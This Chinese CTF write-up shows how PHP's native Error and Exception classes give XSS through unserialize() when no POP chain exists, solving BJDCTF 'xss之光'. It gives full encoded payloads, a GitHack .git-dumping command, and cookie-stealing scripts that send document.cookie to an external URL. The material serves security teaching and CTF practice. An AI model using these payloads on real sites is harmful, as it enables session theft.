这周我做了一道利用php的原生类进行XSS的题目
文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目, 其中就是找到php内置类来进行反序列化。
基础知识
首先还是来回顾一下序列化中的魔术方法,下面也将以此进行研究。
当对象被创建的时候调用:__construct
当对象被销毁的时候调用:__destruct
当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString
序列化对象时就调用的方法(其返回需要是一个数组):__sleep
反序列化恢复对象时就调用的方法:__wakeup
当调用对象中不存在的方法会自动调用此方法:__call
利用__toString
__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。此方法必须返回一个字符串
Error
适用于php7版本
Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方法。如果有个pop链走到一半就走不通了,不如尝试利用这个来做一个xss,其实我看到的还是有好一些cms会选择直接使用 echo 一个反序列化以后的类 的写法,前文说了当对象被当作一个字符串使用时候调用(如echo的时候)会触发__toString方法,这个也看开发人员吧,好的开发人员应该不会这么写,但也是一种挖洞的新思路(对我而言)。
XSS
开启报错的情况下:
测试代码:
<?php
$a = unserialize($_GET['yds']);
echo $a;
?>
exp:
<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>
//得:O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D 这就是生成的 urlencode($b)
则在URL中令
/?yds=O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D
并成功alert
Exception
适用于php5、7版本
这个类利用的方式和原理和Error 类一模一样,但是适用于php5和php7,相对之下更加好用。
XSS
开启报错的情况下:
测试代码:
<?php
$a = unserialize($_GET['yds']);
echo $a;
?>
exp:
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
//得:O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
echo unserialize($c);
则我们在url中令:
/?yds=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
并成功alert
例题——[BJDCTF 2nd]xss之光
拿到题开头gungungun就不会了,没想到是git泄露,直接:
python GitHack.py http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/.git/
拿到源码:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
仅看到是一个反序列化,但是不知道类啊,这就遇到了一个反序列化但没有pop链的情况,所以只能找到php内置类来进行反序列化;又发现有个echo;所以我们最好对有_toString方法的类进行反序列化;在 _toString()的原生类反序列化中,常用的是Error和Exception,Error只适于php7,Exception php5和php7都适用,这里我们查看一下题目的环境发现是php5;
由于此题是xss,所以只要xss执行window.open()就能把flag带出来,所以直接这样:
<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法
也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='http://8ff615f3-da70-4d1a-959f-f29d817ecd90.node3.buuoj.cn'+document.cookie</script>");
echo urlencode(serialize($a));
?>
或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>
结果为:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A110%3A%22%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A14%3A%22%2Fcode%2Fmain.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
访问:
http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
在url中执行以下,flag就在cookies中
或在burp里
其实这种xss的题的flag就藏在cookie里面,所以有时在控制台里面就可以直接找到:
这种情况很少,几乎不可能。
附录:
什么是HttpOnly?
如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。
487
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
